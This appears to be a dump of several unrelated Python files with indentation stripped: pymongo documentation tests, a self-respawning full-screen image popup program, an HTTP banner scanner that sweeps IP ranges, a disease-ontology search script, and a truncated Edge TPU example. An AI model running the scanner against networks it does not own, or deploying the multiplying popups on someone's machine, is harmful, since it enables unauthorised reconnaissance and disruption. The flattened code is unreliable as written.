{"item": "mat",
"qty": 85,
"size": {"h": 27.9, "w": 35.5, "uom": "cm"},
"status": "A"},
{"item": "mousepad",
"qty": 25,
"size": {"h": 19, "w": 22.85, "uom": "cm"},
"status": "P"},
{"item": "notebook",
"qty": 50,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "P"},
{"item": "paper",
"qty": 100,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "D"},
{"item": "planner",
"qty": 75,
"size": {"h": 22.85, "w": 30, "uom": "cm"},
"status": "D"},
{"item": "postcard",
"qty": 45,
"size": {"h": 10, "w": 15.25, "uom": "cm"},
"status": "A"},
{"item": "sketchbook",
"qty": 80,
"size": {"h": 14, "w": 21, "uom": "cm"},
"status": "A"},
{"item": "sketch pad",
"qty": 95,
"size": {"h": 22.85, "w": 30.5, "uom": "cm"},
"status": "A"}])
# End Example 51
# Start Example 52
db.inventory.update_one(
{"item": "paper"},
{"$set": {"size.uom": "cm", "status": "P"},
"$currentDate": {"lastModified": True}})
# End Example 52
for doc in db.inventory.find({"item": "paper"}):
self.assertEqual(doc["size"]["uom"], "cm")
self.assertEqual(doc["status"], "P")
self.assertTrue("lastModified" in doc)
# Start Example 53
db.inventory.update_many(
{"qty": {"$lt": 50}},
{"$set": {"size.uom": "in", "status": "P"},
"$currentDate": {"lastModified": True}})
# End Example 53
for doc in db.inventory.find({"qty": {"$lt": 50}}):
self.assertEqual(doc["size"]["uom"], "in")
self.assertEqual(doc["status"], "P")
self.assertTrue("lastModified" in doc)
# Start Example 54
db.inventory.replace_one(
{"item": "paper"},
{"item": "paper",
"instock": [
{"warehouse": "A", "qty": 60},
{"warehouse": "B", "qty": 40}]})
# End Example 54
for doc in db.inventory.find({"item": "paper"}, {"_id": 0}):
self.assertEqual(len(doc.keys()), 2)
self.assertTrue("item" in doc)
self.assertTrue("instock" in doc)
self.assertEqual(len(doc["instock"]), 2)
def test_delete(self):
db = self.db
# Start Example 55
db.inventory.insert_many([
{"item": "journal",
"qty": 25,
"size": {"h": 14, "w": 21, "uom": "cm"},
"status": "A"},
{"item": "notebook",
"qty": 50,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "P"},
{"item": "paper",
"qty": 100,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "D"},
{"item": "planner",
"qty": 75,
"size": {"h": 22.85, "w": 30, "uom": "cm"},
"status": "D"},
{"item": "postcard",
"qty": 45,
"size": {"h": 10, "w": 15.25, "uom": "cm"},
"status": "A"}])
# End Example 55
self.assertEqual(db.inventory.count_documents({}), 5)
# Start Example 57
db.inventory.delete_many({"status": "A"})
# End Example 57
self.assertEqual(db.inventory.count_documents({}), 3)
# Start Example 58
db.inventory.delete_one({"status": "D"})
# End Example 58
self.assertEqual(db.inventory.count_documents({}), 2)
# Start Example 56
db.inventory.delete_many({})
# End Example 56
self.assertEqual(db.inventory.count_documents({}), 0)
@client_context.require_replica_set
@client_context.require_no_mmap
def test_change_streams(self):
db = self.db
done = False
def insert_docs():
while not done:
db.inventory.insert_one({"username": "alice"})
db.inventory.delete_one({"username": "alice"})
t = threading.Thread(target=insert_docs)
t.start()
try:
# 1. The database for reactive, real-time applications
# Start Changestream Example 1
cursor = db.inventory.watch()
document = next(cursor)
# End Changestream Example 1
# Start Changestream Example 2
cursor = db.inventory.watch(full_document='updateLookup')
document = next(cursor)
# End Changestream Example 2
# Start Changestream Example 3
resume_token = cursor.resume_token
cursor = db.inventory.watch(resume_after=resume_token)
document = next(cursor)
# End Changestream Example 3
# Start Changestream Example 4
pipeline = [
{'$match': {'fullDocument.username': 'alice'}},
{'$addFields': {'newField': 'this is an added field!'}}
]
cursor = db.inventory.watch(pipeline=pipeline)
document = next(cursor)
# End Changestream Example 4
finally:
done = True
t.join()
def test_aggregate_examples(self):
db = self.db
# Start Aggregation Example 1
db.sales.aggregate([
{"$match": {"items.fruit": "banana"}},
{"$sort": {"date": 1}}
])
# End Aggregation Example 1
# Start Aggregation Example 2
db.sales.aggregate([
{"$unwind": "$items"},
{"$match": {"items.fruit": "banana"}},
{"$group": {
"_id": {"day": {"$dayOfWeek": "$date"}},
"count": {"$sum": "$items.quantity"}}
},
{"$project": {
"dayOfWeek": "$_id.day",
"numberSold": "$count",
"_id": 0}
},
{"$sort": {"numberSold": 1}}
])
# End Aggregation Example 2
# Start Aggregation Example 3
db.sales.aggregate([
{"$unwind": "$items"},
{"$group": {
"_id": {"day": {"$dayOfWeek": "$date"}},
"items_sold": {"$sum": "$items.quantity"},
"revenue": {
"$sum": {
"$multiply": [
"$items.quantity", "$items.price"]
}
}
}
},
{"$project": {
"day": "$_id.day",
"revenue": 1,
"items_sold": 1,
"discount": {
"$cond": {
"if": {"$lte": ["$revenue", 250]},
"then": 25,
"else": 0
}
}
}
}
])
# End Aggregation Example 3
# Start Aggregation Example 4
db.air_alliances.aggregate([
{"$lookup": {
"from": "air_airlines",
"let": {"constituents": "$airlines"},
"pipeline": [
{"$match": {"$expr": {"$in": ["$name", "$$constituents"]}}}
],
"as": "airlines"
}
},
{"$project": {
"_id": 0,
"name": 1,
"airlines": {
"$filter": {
"input": "$airlines",
"as": "airline",
"cond": {"$eq": ["$$airline.country", "Canada"]}
}
}
}
}
])
# End Aggregation Example 4
def test_commands(self):
db = self.db
db.restaurants.insert_one({})
# Start runCommand Example 1
db.command("buildInfo")
# End runCommand Example 1
# Start runCommand Example 2
db.command("collStats", "restaurants")
# End runCommand Example 2
def test_index_management(self):
db = self.db
# Start Index Example 1
db.records.create_index("score")
# End Index Example 1
# Start Index Example 1
db.restaurants.create_index(
[("cuisine", pymongo.ASCENDING), ("name", pymongo.ASCENDING)],
partialFilterExpression={"rating": {"$gt": 5}}
)
# End Index Example 1
@client_context.require_replica_set
def test_misc(self):
# Marketing examples
client = self.client
self.addCleanup(client.drop_database, "test")
self.addCleanup(client.drop_database, "my_database")
# 2. Tunable consistency controls
collection = client.my_database.my_collection
with client.start_session() as session:
collection.insert_one({'_id': 1}, session=session)
collection.update_one(
{'_id': 1}, {"$set": {"a": 1}}, session=session)
for doc in collection.find({}, session=session):
pass
# 3. Exploiting the power of arrays
collection = client.test.array_updates_test
collection.update_one(
{'_id': 1},
{"$set": {"a.$[i].b": 2}},
array_filters=[{"i.b": 0}])
class TestTransactionExamples(IntegrationTest):
@client_context.require_transactions
def test_transactions(self):
# Transaction examples
client = self.client
self.addCleanup(client.drop_database, "hr")
self.addCleanup(client.drop_database, "reporting")
employees = client.hr.employees
events = client.reporting.events
employees.insert_one({"employee": 3, "status": "Active"})
events.insert_one(
{"employee": 3, "status": {"new": "Active", "old": None}})
# Start Transactions Intro Example 1
def update_employee_info(session):
employees_coll = session.client.hr.employees
events_coll = session.client.reporting.events
with session.start_transaction(
read_concern=ReadConcern("snapshot"),
write_concern=WriteConcern(w="majority")):
employees_coll.update_one(
{"employee": 3}, {"$set": {"status": "Inactive"}},
session=session)
events_coll.insert_one(
{"employee": 3, "status": {
"new": "Inactive", "old": "Active"}},
session=session)
while True:
try:
# Commit uses write concern set at transaction start.
session.commit_transaction()
print("Transaction committed.")
break
except (ConnectionFailure, OperationFailure) as exc:
# Can retry commit
if exc.has_error_label(
"UnknownTransactionCommitResult"):
print("UnknownTransactionCommitResult, retrying "
"commit operation ...")
continue
else:
print("Error during commit ...")
raise
# End Transactions Intro Example 1
with client.start_session() as session:
update_employee_info(session)
employee = employees.find_one({"employee": 3})
self.assertIsNotNone(employee)
self.assertEqual(employee['status'], 'Inactive')
# Start Transactions Retry Example 1
def run_transaction_with_retry(txn_func, session):
while True:
try:
txn_func(session) # performs transaction
break
except (ConnectionFailure, OperationFailure) as exc:
print("Transaction aborted. Caught exception during "
"transaction.")
# If transient error, retry the whole transaction
if exc.has_error_label("TransientTransactionError"):
print("TransientTransactionError, retrying"
"transaction ...")
continue
else:
raise
# End Transactions Retry Example 1
with client.start_session() as session:
run_transaction_with_retry(update_employee_info, session)
employee = employees.find_one({"employee": 3})
self.assertIsNotNone(employee)
self.assertEqual(employee['status'], 'Inactive')
# Start Transactions Retry Example 2
def commit_with_retry(session):
while True:
try:
# Commit uses write concern set at transaction start.
session.commit_transaction()
print("Transaction committed.")
break
except (ConnectionFailure, OperationFailure) as exc:
# Can retry commit
if exc.has_error_label("UnknownTransactionCommitResult"):
print("UnknownTransactionCommitResult, retrying "
"commit operation ...")
continue
else:
print("Error during commit ...")
raise
# End Transactions Retry Example 2
# Test commit_with_retry from the previous examples
def _insert_employee_retry_commit(session):
with session.start_transaction():
employees.insert_one(
{"employee": 4, "status": "Active"},
session=session)
events.insert_one(
{"employee": 4, "status": {"new": "Active", "old": None}},
session=session)
commit_with_retry(session)
with client.start_session() as session:
run_transaction_with_retry(_insert_employee_retry_commit, session)
employee = employees.find_one({"employee": 4})
self.assertIsNotNone(employee)
self.assertEqual(employee['status'], 'Active')
# Start Transactions Retry Example 3
def run_transaction_with_retry(txn_func, session):
while True:
try:
txn_func(session) # performs transaction
break
except (ConnectionFailure, OperationFailure) as exc:
# If transient error, retry the whole transaction
if exc.has_error_label("TransientTransactionError"):
print("TransientTransactionError, retrying "
"transaction ...")
continue
else:
raise
def commit_with_retry(session):
while True:
try:
# Commit uses write concern set at transaction start.
session.commit_transaction()
print("Transaction committed.")
break
except (ConnectionFailure, OperationFailure) as exc:
# Can retry commit
if exc.has_error_label("UnknownTransactionCommitResult"):
print("UnknownTransactionCommitResult, retrying "
"commit operation ...")
continue
else:
print("Error during commit ...")
raise
# Updates two collections in a transactions
def update_employee_info(session):
employees_coll = session.client.hr.employees
events_coll = session.client.reporting.events
with session.start_transaction(
read_concern=ReadConcern("snapshot"),
write_concern=WriteConcern(w="majority"),
read_preference=ReadPreference.PRIMARY):
employees_coll.update_one(
{"employee": 3}, {"$set": {"status": "Inactive"}},
session=session)
events_coll.insert_one(
{"employee": 3, "status": {
"new": "Inactive", "old": "Active"}},
session=session)
commit_with_retry(session)
# Start a session.
with client.start_session() as session:
try:
run_transaction_with_retry(update_employee_info, session)
except Exception as exc:
# Do something with error.
raise
# End Transactions Retry Example 3
employee = employees.find_one({"employee": 3})
self.assertIsNotNone(employee)
self.assertEqual(employee['status'], 'Inactive')
MongoClient = lambda _: rs_client()
uriString = None
# Start Transactions withTxn API Example 1
# For a replica set, include the replica set name and a seedlist of the members in the URI string; e.g.
# uriString = 'mongodb://mongodb0.example.com:27017,mongodb1.example.com:27017/?replicaSet=myRepl'
# For a sharded cluster, connect to the mongos instances; e.g.
# uriString = 'mongodb://mongos0.example.com:27017,mongos1.example.com:27017/'
client = MongoClient(uriString)
wc_majority = WriteConcern("majority", wtimeout=1000)
# Prereq: Create collections.
client.get_database(
"mydb1", write_concern=wc_majority).foo.insert_one({'abc': 0})
client.get_database(
"mydb2", write_concern=wc_majority).bar.insert_one({'xyz': 0})
# Step 1: Define the callback that specifies the sequence of operations to perform inside the transactions.
def callback(session):
collection_one = session.client.mydb1.foo
collection_two = session.client.mydb2.bar
# Important:: You must pass the session to the operations.
collection_one.insert_one({'abc': 1}, session=session)
collection_two.insert_one({'xyz': 999}, session=session)
# Step 2: Start a client session.
with client.start_session() as session:
# Step 3: Use with_transaction to start a transaction, execute the callback, and commit (or abort on error).
session.with_transaction(
callback, read_concern=ReadConcern('local'),
write_concern=wc_majority,
read_preference=ReadPreference.PRIMARY)
# End Transactions withTxn API Example 1
class TestCausalConsistencyExamples(IntegrationTest):
@client_context.require_secondaries_count(1)
@client_context.require_no_mmap
def test_causal_consistency(self):
# Causal consistency examples
client = self.client
self.addCleanup(client.drop_database, 'test')
client.test.drop_collection('items')
client.test.items.insert_one({
'sku': "111", 'name': 'Peanuts',
'start':datetime.datetime.today()})
# Start Causal Consistency Example 1
with client.start_session(causal_consistency=True) as s1:
current_date = datetime.datetime.today()
items = client.get_database(
'test', read_concern=ReadConcern('majority'),
write_concern=WriteConcern('majority', wtimeout=1000)).items
items.update_one(
{'sku': "111", 'end': None},
{'$set': {'end': current_date}}, session=s1)
items.insert_one(
{'sku': "nuts-111", 'name': "Pecans",
'start': current_date}, session=s1)
# End Causal Consistency Example 1
# Start Causal Consistency Example 2
with client.start_session(causal_consistency=True) as s2:
s2.advance_cluster_time(s1.cluster_time)
s2.advance_operation_time(s1.operation_time)
items = client.get_database(
'test', read_preference=ReadPreference.SECONDARY,
read_concern=ReadConcern('majority'),
write_concern=WriteConcern('majority', wtimeout=1000)).items
for item in items.find({'end': None}, session=s2):
print(item)
# End Causal Consistency Example 2
class TestVersionedApiExamples(IntegrationTest):
@client_context.require_version_min(4, 7)
def test_versioned_api(self):
# Versioned API examples
MongoClient = lambda _, server_api: rs_client(
server_api=server_api, connect=False)
uri = None
# Start Versioned API Example 1
from pymongo.server_api import ServerApi
client = MongoClient(uri, server_api=ServerApi("1"))
# End Versioned API Example 1
# Start Versioned API Example 2
client = MongoClient(
uri, server_api=ServerApi("1", strict=True))
# End Versioned API Example 2
# Start Versioned API Example 3
client = MongoClient(
uri, server_api=ServerApi("1", strict=False))
# End Versioned API Example 3
# Start Versioned API Example 4
client = MongoClient(
uri, server_api=ServerApi("1", deprecation_errors=True))
# End Versioned API Example 4
@client_context.require_version_min(4, 7)
def test_versioned_api_migration(self):
# SERVER-58785
if (client_context.is_topology_type(["sharded"]) and
not client_context.version.at_least(5, 0, 2)):
self.skipTest("This test needs MongoDB 5.0.2 or newer")
client = rs_client(server_api=ServerApi("1", strict=True))
client.db.sales.drop()
# Start Versioned API Example 5
def strptime(s):
return datetime.datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")
client.db.sales.insert_many([
{"_id": 1, "item": "abc", "price": 10, "quantity": 2, "date": strptime("2021-01-01T08:00:00Z")},
{"_id": 2, "item": "jkl", "price": 20, "quantity": 1, "date": strptime("2021-02-03T09:00:00Z")},
{"_id": 3, "item": "xyz", "price": 5, "quantity": 5, "date": strptime("2021-02-03T09:05:00Z")},
{"_id": 4, "item": "abc", "price": 10, "quantity": 10, "date": strptime("2021-02-15T08:00:00Z")},
{"_id": 5, "item": "xyz", "price": 5, "quantity": 10, "date": strptime("2021-02-15T09:05:00Z")},
{"_id": 6, "item": "xyz", "price": 5, "quantity": 5, "date": strptime("2021-02-15T12:05:10Z")},
{"_id": 7, "item": "xyz", "price": 5, "quantity": 10, "date": strptime("2021-02-15T14:12:12Z")},
{"_id": 8, "item": "abc", "price": 10, "quantity": 5, "date": strptime("2021-03-16T20:20:13Z")}
])
# End Versioned API Example 5
with self.assertRaisesRegex(
OperationFailure, "Provided apiStrict:true, but the command "
"count is not in API Version 1"):
client.db.command('count', 'sales', query={})
# Start Versioned API Example 6
# pymongo.errors.OperationFailure: Provided apiStrict:true, but the command count is not in API Version 1, full error: {'ok': 0.0, 'errmsg': 'Provided apiStrict:true, but the command count is not in API Version 1', 'code': 323, 'codeName': 'APIStrictError'}
# End Versioned API Example 6
# Start Versioned API Example 7
client.db.sales.count_documents({})
# End Versioned API Example 7
# Start Versioned API Example 8
# 8
# End Versioned API Example 8
if __name__ == "__main__":
unittest.main()
|
popup.pyw
|
import os, random as rand, tkinter as tk, time, json, pathlib, webbrowser, ctypes, threading as thread
from tkinter import *
from tkinter import messagebox
from itertools import count, cycle
from PIL import Image, ImageTk
#Start Imported Code
#Code from: https://code.activestate.com/recipes/460509-get-the-actual-and-usable-sizes-of-all-the-monitor/
user = ctypes.windll.user32
class RECT(ctypes.Structure): #rect class for containing monitor info
_fields_ = [
('left', ctypes.c_long),
('top', ctypes.c_long),
('right', ctypes.c_long),
('bottom', ctypes.c_long)
]
def dump(self):
return map(int, (self.left, self.top, self.right, self.bottom))
class MONITORINFO(ctypes.Structure): #unneeded for this, but i don't want to rework the entire thing because i'm stupid
_fields_ = [
('cbSize', ctypes.c_ulong),
('rcMonitor', RECT),
('rcWork', RECT),
('dwFlags', ctypes.c_ulong)
]
def get_monitors():
retval = []
CBFUNC = ctypes.WINFUNCTYPE(ctypes.c_int, ctypes.c_ulong, ctypes.c_ulong, ctypes.POINTER(RECT), ctypes.c_double)
def cb(hMonitor, hdcMonitor, lprcMonitor, dwData):
r = lprcMonitor.contents
data = [hMonitor]
data.append(r.dump())
retval.append(data)
return 1
cbfunc = CBFUNC(cb)
temp = user.EnumDisplayMonitors(0, 0, cbfunc, 0)
return retval
def monitor_areas(): #all that matters from this is list(mapObj[monitor index][1])[k]; this is the list of monitor dimensions
retval = []
monitors = get_monitors()
for hMonitor, extents in monitors:
data = [hMonitor]
mi = MONITORINFO()
mi.cbSize = ctypes.sizeof(MONITORINFO)
mi.rcMonitor = RECT()
mi.rcWork = RECT()
res = user.GetMonitorInfoA(hMonitor, ctypes.byref(mi))
data.append(mi.rcMonitor.dump())
data.append(mi.rcWork.dump())
retval.append(data)
return retval
#End Imported Code
allow_scream = True
show_captions = False
has_captions = False
panic_disabled = False
extreme_mode = False
web_open = False
has_lifespan = False
lifespan = 0
web_prob = 0
mitosis_stren = 2
submission_text = 'I Submit <3'
sqLim = 800
panic_key = ''
captions = json.loads('{}')
FADE_OUT_TIME = 1.5
PATH = str(pathlib.Path(__file__).parent.absolute())
os.chdir(PATH)
with open(PATH + '\\config.cfg', 'r') as cfg:
jsonObj = json.loads(cfg.read())
show_captions = int(jsonObj['showCaptions']) == 1
allow_scream = int(jsonObj['promptMod']) == 0
panic_disabled = int(jsonObj['panicDisabled']) == 1
mitosis_enabled = int(jsonObj['mitosisMode']) == 1
web_open = int(jsonObj['webPopup']) == 1
web_prob = int(jsonObj['webMod'])
sqLim = int(jsonObj['squareLim'])
panic_key = jsonObj['panicButton']
has_lifespan = int(jsonObj['timeoutPopups']) == 1
if has_lifespan:
lifespan = int(jsonObj['popupTimeout'])
mitosis_stren = int(jsonObj['mitosisStrength'])
#extreme_mode = int(jsonObj['extremeMode']) == 1
if web_open:
webJsonDat = ''
if os.path.exists(PATH + '\\resource\\web.json'):
with open(PATH + '\\resource\\web.json', 'r') as webF:
webJsonDat = json.loads(webF.read())
hasWeb = len(webJsonDat['urls']) > 0
try:
with open(PATH + '\\resource\\captions.json', 'r') as capF:
captions = json.loads(capF.read())
has_captions = True
try:
submission_text = captions['subtext']
except:
print('will use default submission text')
except:
print('no captions.json')
class GImg(tk.Label):
def load(self, path, rWid, rHgt, delay=75):
self.image = Image.open(path)
self.frames = []
self.delay = delay
try:
for i in count(1):
self.frames.append(ImageTk.PhotoImage(self.image.resize((rWid, rHgt), Image.BOX).copy()))
self.image.seek(i)
except:
print('Done register frames. (' + str(len(self.frames)) + ')')
self.frames_ = cycle(self.frames)
def nextFrame(self):
if self.frames_:
self.config(image=next(self.frames_))
self.after(self.delay, self.nextFrame)
def unborderedWindow():
#var things
arr = os.listdir(os.path.abspath(os.getcwd()) + '\\resource\\img\\')
item = arr[rand.randrange(len(arr))]
while item.split('.')[len(item.split('.')) - 1].lower() == 'ini':
item = arr[rand.randrange(len(arr))]
image = Image.open(os.path.abspath(os.getcwd()) + '\\resource\\img\\' + item)
gif_bool = item.split('.')[len(item.split('.')) - 1].lower() == 'gif'
border_wid_const = 5
monitor_data = monitor_areas()
data_list = list(monitor_data[rand.randrange(0, len(monitor_data))][2])
screenWid = data_list[2] - data_list[0]
screenHgt = data_list[3] - data_list[1]
#window start
root = Tk()
root.bind('<KeyPress>', lambda key: panic(key))
root.configure(bg='black')
root.overrideredirect(1)
root.frame = Frame(root, borderwidth=border_wid_const, relief=RAISED)
root.wm_attributes('-topmost', 1)
#many thanks to @MercyNudes for fixing my old braindead scaling method (https://twitter.com/MercyNudes)
def bResize(img) -> Image:
size_source = max(img.width, img.height) / min(screenWid, screenHgt)
size_target = rand.randint(30, 70) / 100
resize_factor = size_target / size_source
return image.resize((int(image.width * resize_factor), int(image.height * resize_factor)), Image.ANTIALIAS)
image = bResize(image)
while(image.height > screenHgt or image.width > screenWid):
image = image.resize((int(image.width*0.75), int(image.height*0.75)), Image.ANTIALIAS)
rImg = image #bResize(image)
image_ = ImageTk.PhotoImage(rImg)
#different handling for gifs vs normal images
if(not gif_bool):
label = Label(root, image=image_, bg='black')
label.grid(row=0, column=0)
else:
label = GImg(root)
label.load(path=os.path.abspath(os.getcwd()) + '\\resource\\img\\' + item, rWid = rImg.width, rHgt = rImg.height)
label.pack()
locX = rand.randint(data_list[0], data_list[2] - (rImg.width))
locY = rand.randint(data_list[1], max(data_list[3] - (rImg.height), 0))
root.geometry('%dx%d+%d+%d' % ((rImg.width), (rImg.height), locX, locY))
if(gif_bool):
label.nextFrame()
if has_lifespan:
thread.Thread(target=lambda: liveLife(root)).start()
if show_captions and has_captions:
capText = selectCaption(item)
if len(capText) > 0:
captionLabel = Label(root, text=capText, wraplength=rImg.width - border_wid_const)
captionLabel.place(x=5, y=5)
subButton = Button(root, text=submission_text, command=die)
subButton.place(x=rImg.width - 5 - subButton.winfo_reqwidth(), y=rImg.height - 5 - subButton.winfo_reqheight())
#disabled for performance
#if allow_scream:
# thread.Thread(target=lambda: scream(root)).start()
root.mainloop()
def liveLife(parent):
time.sleep(lifespan)
for i in range(0, 100):
parent.attributes('-alpha', 1-i/100)
time.sleep(FADE_OUT_TIME / 100)
os.kill(os.getpid(), 9)
def doRoll(mod):
return mod > rand.randint(0, 100)
def urlSelect(arg):
return webJsonDat['urls'][arg] + webJsonDat['args'][arg].split(',')[rand.randrange(len(webJsonDat['args'][arg].split(',')))]
def scream(root):
while True:
time.sleep(rand.randint(1, 3))
root.focus_force()
def die():
if web_open and hasWeb and doRoll((100-web_prob) / 2):
urlPath = urlSelect(rand.randrange(len(webJsonDat['urls'])))
webbrowser.open_new(urlPath)
if mitosis_enabled:
for i in range(0, mitosis_stren):
os.startfile('popup.pyw')
os.kill(os.getpid(), 9)
def selectCaption(strObj):
for obj in captions['prefix']:
if strObj.startswith(obj):
ls = captions[obj]
ls.extend(captions['default'])
return ls[rand.randrange(0, len(captions[obj]))]
return captions['default'][rand.randrange(0, len(captions['default']))] if (len(captions['default']) > 0) else ''
def panic(key):
if not panic_disabled and (key.keysym == panic_key or key.keycode == panic_key): #(post or is to keep backwards compatibility)
os.startfile('panic.pyw')
try:
unborderedWindow()
except Exception as e:
messagebox.showerror('Popup Error', 'Could not show popup.\n[' + str(e) + ']')
|
scan_web_banner.py
|
#/usr/bin/env python
#-*-coding=utf-8-*-
# __author__ = 'Zline'
import requests
import re
from threading import Thread,Lock
import time
import sys
import chardet
import netaddr
import struct
import socket
lock = Lock()
def ip2int(addr):
return struct.unpack("!I", socket.inet_aton(addr))[0]
def int2ip(addr):
return socket.inet_ntoa(struct.pack("!I", addr))
def int_dec(pagehtml):
charset = None
if pagehtml != '':
# print 'use charset dect'
enc = chardet.detect(pagehtml)
# print 'enc= ', enc
if enc['encoding'] and enc['confidence'] > 0.9:
charset = enc['encoding']
if charset == None:
charset_re = re.compile("((^|;)\s*charset\s*=)([^\"']*)", re.M)
charset=charset_re.search(pagehtml[:1000])
charset=charset and charset.group(3) or None
# test charset
try:
if charset:
unicode('test',charset,errors='replace')
except Exception,e:
print 'Exception',e
charset = None
# print 'charset=', charset
return charset
def http_banner(url):
ip=url
try:
url=requests.get(url,timeout=2)
body = url.content
charset = None
if body != '':
charset = int_dec(body)
if charset == None or charset == 'ascii':
charset = 'ISO-8859-1'
if charset and charset != 'ascii' and charset != 'unicode':
try:
body = unicode(body,charset,errors='replace')
except Exception, e:
body = ''
Struts=url.status_code
Server=url.headers['server'][0:13]
if Struts==200 or Struts==403 or Struts==401:
title=re.findall(r"<title>(.*)<\/title>",body)
if len(title):
title = title[0].strip()
else:
title = ''
lock.acquire()
print ('%s\t%d\t%-10s\t%s'%(ip.lstrip('http://'),Struts,Server,title))
lock.release()
except (requests.HTTPError,requests.RequestException,AttributeError,KeyError),e:
pass
if __name__ == '__main__':
if len(sys.argv) >= 2:
ips = sys.argv[1]
else:
print 'usage: python http_banner.py 192.168.1./24 '
print 'usage: python http_banner.py 192.168.1.1-192.168.1.254 '
print 'usage: python http_banner.py 192.168.1./24 8080'
print 'usage: python http_banner.py 192.168.1.1-192.168.1.254 8080'
sys.exit()
port = '80'
if len(sys.argv) == 3:
port = sys.argv[2]
if '-' in ips:
start, end = ips.split('-')
startlong = ip2int(start)
endlong = ip2int(end)
ips = netaddr.IPRange(start,end)
for ip in list(ips):
url='http://%s:%s'%(ip,port)
t = Thread(target=http_banner,args=(url,))
t.daemon=False
t.start()
elif '/' in ips:
ips = netaddr.IPNetwork(ips)
for ip in list(ips):
url='http://%s:%s'%(ip,port)
t = Thread(target=http_banner,args=(url,))
t.daemon=False
t.start()
|
search_engine.py
|
from gensim.models import word2vec, doc2vec
from threading import Thread
from time import sleep
import numpy as np
from wiki_pubmed_fuzzy.ontology import get_ontology
import fuzzywuzzy.process as fuzzy_process
from fuzzywuzzy import fuzz
from wiki_pubmed_fuzzy import wiki
from wiki_pubmed_fuzzy import pubmed
from src_tree.best_vertex import find_best_vertex
from bot.lookup import search_doid
from NLP import nlp
#from xxx import xxx
from bot import lookup
#query_results = None
def fn_get_q(query, names, mode='W'):
if mode == 'W':
scorer=fuzz.WRatio
else:
scorer=fuzz.ratio
try:
global query_results
query_results = fuzzy_process.extractOne(query, names, scorer=scorer)
return True
except:
return False
def fn_get_nlp(syns, names):
try:
global nlp_results
nlp_results=[fuzzy_process.extractOne(syn, names, scorer=fuzz.ratio) for syn in syns]
return True
except:
return False
#wiki_results = None
def fn_get_wiki(query, names):
try:
global wiki_results
header = wiki.get_top_headers(query, 1)[0]
wiki_results = fuzzy_process.extractOne(header, names, scorer=fuzz.ratio)
#sleep(0.1)
return True
except:
return False
#
pubmed_results = None
def fn_get_pubmed(query, names):
global pubmed_results
string = pubmed.get(query, topK=1)
if string is not None:
string = string[0]
pubmed_results = fuzzy_process.extractOne(string, names, scorer=fuzz.partial_ratio)
return True
else:
return False
from graphviz import Digraph
from src_tree.best_vertex import check_parent
def plot(doid,ontology):
dot = Digraph(comment='Neighborhood')
term_doid = ontology.get_term(doid)
label_doid = term_doid.name
dot.node('A', label_doid)
letter = 'A'
if check_parent(doid,ontology) > 0:
dict = {term.name: term.id for term in ontology.get_terms()}
father = dict[term_doid.relationships[0][2]]
term_father = ontology.get_term(father)
label_father = term_father.name
letter = 'B'
dot.node(letter, label_father)
dot.edges([''.join(['B','A'])])
children = [term.id for term in ontology.get_terms() if len(term.relationships) > 0 and term.relationships[0][1] == doid]
#print children
if len(children) > 0:
for child in children:
term_child = ontology.get_term(child)
label_child = term_child.name
letter = chr(ord(letter) + 1)
dot.node(letter, label_child)
dot.edges([''.join(['A',letter])])
return dot
'''main'''
## from bot
query = 'cardiovascular disease'
def find_answer(query, model_trigram, model_doc2vec):
query = query.lower()
# load ontology
ontology = get_ontology('data/doid.obo')
name2doid = {term.name: term.id for term in ontology.get_terms()}
names = name2doid.keys()
doid2name = {term.id: term.name for term in ontology.get_terms()}
## exact match
if query in name2doid.keys():
doid = name2doid[query]
confidence = 100
else:
# no exact match
th_get_q = Thread(target = fn_get_q, args = (query,names,))
th_get_wiki = Thread(target = fn_get_wiki, args = (query,names,))
th_get_pubmed = Thread(target = fn_get_pubmed, args = (query,names,))
th_get_q.start()
th_get_wiki.start()
th_get_pubmed.start()
doids = set()
doid_exact_results = search_doid(query, False, doids)
doids = [d for d in doids if d in doid2name.keys()]
synonyms_nlp = nlp.synonyms(query, model_trigram)
th_get_nlp = Thread(target=fn_get_nlp, args=(synonyms_nlp, names,))
th_get_nlp.start()
best_vertex = find_best_vertex(doids,ontology)
doid = best_vertex
confidence = None
th_get_q.join()
th_get_wiki.join()
th_get_pubmed.join()
th_get_nlp.join()
results = [query_results] + [wiki_results] + [pubmed_results] + nlp_results
d_len = len(doids)
doids = doids + [name2doid[tup[0]] for tup in results]
prob = np.array([tup[1] for tup in results])
prob = np.concatenate((np.ones(d_len)*prob.mean(), prob))
doid = doids[prob.argmax()]
confidence = prob.max()
dot = plot(doid,ontology)
dot.format='png'
graph = dot.render('test-output/round-table.gv', view=False)
string = ("Query: {:}\n".format(query) +
"Name: {:}\n".format(doid2name[doid]) +
"# {:}\n".format(doid) +
"Confidence: {:}%\n".format(confidence))
return string, graph
|
model_pipelining_classify_image.py
|
# Lint as: python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Example to classify a given image using model pipelining with two Edge TPUs.
To run this code, you must attach two Edge TPUs attached to the host and
install the Edge TPU runtime (`libedgetpu.so`) and `tflite_runtime`. For
device setup instructions, see g.co/coral/setup.
Example usage:
```
bash examples/install_requirements.sh model_pipelining_classify_image.py
python3 examples/model_pipelining_classify_image.py \
--models \
test_data/pipeline/inception_v3_299_quant_segment_%d_of_2_edgetpu.tflite \
--labels test_data/imagenet_labels.txt \
--input test_data/parrot.jpg
```
"""
import argparse
import re
import threading
import time
import numpy as np
from PIL import Image
from pycoral.adapters import classify
from pycoral.adapters import common
import pycoral.pipeline.pipelined_model_runner as pipeline
from pycoral.utils.dataset import read_label_file
from pycoral.utils.edgetpu import list_edge_tpus
from pycoral.utils.edgetpu import make_interpreter
def _get_devices(num_devices):
"""Returns list of device names in usb:N or pci:N format.
This function prefers returning PCI Edge TPU first.
Args:
num_devices: int, number of devices expected
Returns:
list of devices in pci:N and/or usb:N format
Raises:
RuntimeError: if not enough devices are available
"""
edge_tpus = list_edge_tpus()
if len(edge_tpus) < num_devices:
raise RuntimeError(
